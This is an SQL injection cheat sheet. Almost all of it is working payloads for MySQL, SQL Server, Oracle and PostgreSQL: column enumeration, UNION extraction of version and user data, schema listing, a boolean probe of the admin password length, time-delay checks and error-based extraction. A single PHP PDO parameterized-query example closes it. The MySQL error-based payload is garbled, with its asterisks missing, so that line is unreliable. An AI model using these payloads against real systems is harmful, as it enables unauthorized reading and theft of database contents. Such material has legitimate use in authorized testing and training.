SQL Injection Cheat Sheet

BASIC SQL INJECTION

Determine number of columns:

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- (continue until error)

Get data with UNION:

Database	UNION Attack Example
MySQL	' UNION SELECT 1,2,@@version,user(),database() --
SQL Server	' UNION SELECT 1,2,@@version,system_user,db_name() --
Oracle	' UNION SELECT 1,2,banner,user,NULL FROM v$version --
PostgreSQL	' UNION SELECT 1,2,version(),user,current_database() --

Information	MySQL	SQL Server
Current User	SELECT user() SELECT current_user()	SELECT user_name() SELECT system_user
List Databases	SELECT schema_name FROM information_schema.schemata	SELECT name FROM master..sysdatabases
List Tables	SELECT table_name FROM information_schema.tables WHERE table_schema='database_name'	SELECT name FROM database_name..sysobjects WHERE xtype='U'
List Columns	SELECT column_name FROM information_schema.columns WHERE table_name='table_name'	SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='table_name')

Boolean-based:

' AND (SELECT 'x' FROM users WHERE username='admin' AND LENGTH(password)>5)='x'--

Time-based:

Database	Time Delay Payload
MySQL	' AND (SELECT SLEEP(5))-- ' AND IF(1=1, SLEEP(5), 0)--
SQL Server	' WAITFOR DELAY '0:0:5'--
PostgreSQL	' SELECT pg_sleep(5)--
Oracle	' AND (SELECT DBMS_PIPE.RECEIVE_MESSAGE('RND',5) FROM DUAL) IS NOT NULL--

Database	Error-based Payload
MySQL	AND (SELECT 1 FROM (SELECT COUNT(),CONCAT(version(),FLOOR(RAND(0)2))x FROM information_schema.tables GROUP BY x)a)--
SQL Server	AND 1=CONVERT(int,(SELECT @@version))
PostgreSQL	AND 1=cast((SELECT version()) as int)
Oracle	AND 1=ctxsys.drithsx.sn(1,(SELECT banner FROM v$version WHERE rownum=1))

// Example of parameterized query
// PHP PDO
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$username]);